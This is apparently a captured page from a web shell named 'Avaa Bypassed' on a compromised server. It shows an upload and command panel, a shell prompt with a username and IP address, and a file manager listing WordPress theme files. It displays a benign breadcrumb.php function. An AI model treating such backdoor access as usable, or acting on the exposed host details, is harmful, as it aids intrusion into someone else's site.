[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.227.10.102: ~ $
<?php

function organic_farm_breadcrumb() {
    $separator = get_theme_mod('organic_farm_breadcrumb_separator', ' / '); // Define the separator here

    if (is_home()){
        echo "<span>Home</span>";
    }
    else if (!is_home()) {
        echo '<a href="'. home_url() .'">Home</a>' . $separator;

       if (is_archive()) {
            if (is_category()) {
                // If it's a category archive page
                echo "<span>";
                single_cat_title();
                echo "</span>";
            } elseif (is_tag()) {
                // If it's a tag archive page
                echo "<span>";
                single_tag_title();
                echo "</span>";
            } elseif (is_date()) {
                // If it's a date-based archive page
                echo "<span>";
                echo get_the_date('F Y');
                echo "</span>";
            }
            elseif (is_author()){
                echo '<span>Author: ';
                the_author();
                echo '</span>';
            }
            else {
                // For other archive pages, you can customize this part
                echo post_type_archive_title() . $separator;
            }
        }
        elseif (is_category() || is_single()) {
            // For regular posts or category pages
            the_category(', ');
            echo $separator; // Add the separator here
            if (is_single()) {
                echo "<span>";
                the_title();
                echo "</span>";
            }
        }
        elseif (is_page()) {
            // For regular pages
            echo "<span>";
            the_title();
            echo "</span>";
        }
        // Search results
        elseif (is_search()) {
            echo '<span>Search Results for: ' . get_search_query() . '</span>';
        }
        else if(is_404()){
            echo "<span>404</span>";
        }
        else{
            echo "<span>";
            the_title();
            echo "</span>";
        }
    }
}


Filemanager

Name Type Size Permission Actions
TGM Folder 0755
dashboard Folder 0755
sortable Folder 0755
switch Folder 0755
breadcrumb.php File 2 KB 0644
custom-control.php File 3.3 KB 0644
custom-header.php File 2.05 KB 0644
customizer-home-page.php File 30.92 KB 0644
customizer.php File 68.28 KB 0644
extra_customization.php File 14.53 KB 0644
icon-picker.php File 20.48 KB 0644
section-pro.php File 1.36 KB 0644
template-functions.php File 1.5 KB 0644
template-tags.php File 2.48 KB 0644
typofont.php File 2.61 KB 0644
wptt-webfont-loader.php File 17.09 KB 0644